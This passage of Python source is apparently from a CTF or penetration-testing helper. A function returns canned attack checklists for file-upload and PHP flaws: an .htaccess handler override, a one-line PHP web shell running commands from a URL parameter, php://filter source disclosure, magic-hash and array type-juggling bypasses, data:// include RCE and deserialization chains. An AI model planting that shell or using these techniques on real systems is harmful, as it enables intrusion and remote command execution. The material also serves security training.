            "5. [BYPASS] .htaccess upload to override handler\n"
            "6. [EXECUTE] Access uploaded shell for RCE\n"
            "\n"
            "Tips: The shell content matters less than bypassing filters.\n"
            "Common web shell: <?php system($_GET[\u0027cmd\u0027]); ?>"
        ),
        "PHP": (
            "=== PHP Vulnerability Attack Guide ===\n"
            "\n"
            "1. [SOURCE] php://filter/convert.base64-encode/resource=index.php\n"
            "2. [HASH] Magic hashes: 0e-prefix MD5 for loose comparison (==)\n"
            "3. [ARRAY] Array bypass: param[]=1 for strcmp/md5 juggling\n"
            "4. [WRAPPER] data://text/plain for include-based RCE\n"
            "5. [DESER] PHP deserialization via __wakeup/__destruct chains\n"
            "\n"
            "Tips: PHP type juggling is a unique attack surface.\n"
            "Look for loose comparisons (==) and strcmp usage."
        ),
    }
    return guides.get(
        vuln_type,
        f"=== {vuln_type} Attack Guide ===\n\n"
        f"No detailed guide available for this type.\n"
        f"Refer to the payload library for attack vectors."
    )
